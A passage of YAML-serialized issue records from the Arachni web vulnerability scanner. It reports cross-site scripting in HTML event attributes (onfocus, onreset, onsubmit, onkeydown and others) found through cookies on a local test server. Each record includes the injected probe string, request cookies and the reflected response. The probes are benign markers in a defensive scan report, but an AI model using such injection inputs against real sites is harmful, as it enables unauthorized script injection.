    response: <a href='/' onchange=default-onchange;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onchange</a><a href='/' onchange="default-onchange;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onchange</a><a href='/' onchange='default-onchange;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onchange</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/cookie/onchange
    var: onchange
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: cookie
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/cookie/onfocus
  var: onfocus
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus%3Barachni_xss_in_element_event%3D71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "433"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onfocus="default-onfocus;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onfocus</a>
    injected: default-onfocus;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: onfocus
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        onfocus: default-onfocus;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: default-onfocus;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        onfocus: default-onfocus;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/cookie/onfocus
      :id: <a href="/" onfocus="default-onfocus;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onfocus</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onfocus=default-onfocus;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onfocus</a><a href='/' onfocus="default-onfocus;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onfocus</a><a href='/' onfocus='default-onfocus;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onfocus</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/cookie/onfocus
    var: onfocus
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: cookie
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/cookie/onreset
  var: onreset
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset%3Barachni_xss_in_element_event%3D71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "433"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onreset="default-onreset;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onreset</a>
    injected: default-onreset;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: onreset
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        onreset: default-onreset;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: default-onreset;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        onreset: default-onreset;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/cookie/onreset
      :id: <a href="/" onreset="default-onreset;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onreset</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onreset=default-onreset;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onreset</a><a href='/' onreset="default-onreset;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onreset</a><a href='/' onreset='default-onreset;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onreset</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/cookie/onreset
    var: onreset
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: cookie
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/cookie/onselect
  var: onselect
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect%3Barachni_xss_in_element_event%3D71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "442"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onselect="default-onselect;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onselect</a>
    injected: default-onselect;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: onselect
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        onselect: default-onselect;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: default-onselect;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        onselect: default-onselect;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/cookie/onselect
      :id: <a href="/" onselect="default-onselect;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onselect</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onselect=default-onselect;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onselect</a><a href='/' onselect="default-onselect;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onselect</a><a href='/' onselect='default-onselect;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onselect</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/cookie/onselect
    var: onselect
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: cookie
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/cookie/onsubmit
  var: onsubmit
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit%3Barachni_xss_in_element_event%3D71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "442"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onsubmit="default-onsubmit;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onsubmit</a>
    injected: default-onsubmit;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: onsubmit
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        onsubmit: default-onsubmit;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: default-onsubmit;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        onsubmit: default-onsubmit;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/cookie/onsubmit
      :id: <a href="/" onsubmit="default-onsubmit;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onsubmit</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onsubmit=default-onsubmit;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onsubmit</a><a href='/' onsubmit="default-onsubmit;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onsubmit</a><a href='/' onsubmit='default-onsubmit;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onsubmit</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/cookie/onsubmit
    var: onsubmit
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: cookie
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/cookie/onabort
  var: onabort
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort%3Barachni_xss_in_element_event%3D71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "433"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onabort="default-onabort;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onabort</a>
    injected: default-onabort;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: onabort
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        onabort: default-onabort;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: default-onabort;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        onabort: default-onabort;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/cookie/onabort
      :id: <a href="/" onabort="default-onabort;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onabort</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onabort=default-onabort;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onabort</a><a href='/' onabort="default-onabort;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onabort</a><a href='/' onabort='default-onabort;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onabort</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/cookie/onabort
    var: onabort
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: cookie
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/cookie/onkeydown
  var: onkeydown
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown%3Barachni_xss_in_element_event%3D71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "451"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onkeydown="default-onkeydown;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeydown</a>
    injected: default-onkeydown;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: onkeydown
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        onkeydown: default-onkeydown;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: default-onkeydown;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        onkeydown: default-onkeydown;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/cookie/onkeydown
      :id: <a href="/" onkeydown="default-onkeydown;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeydown</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onkeydown=default-onkeydown;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onkeydown</a><a href='/' onkeydown="default-onkeydown;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeydown</a><a href='/' onkeydown='default-onkeydown;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onkeydown</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/cookie/onkeydown
    var: onkeydown
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: cookie
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/cookie/onkeypress
  var: onkeypress
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress%3Barachni_xss_in_element_event%3D71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "460"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onkeypress="default-onkeypress;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeypress</a>
    injected: default-onkeypress;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: onkeypress
      :element: cookie
      :params: {}

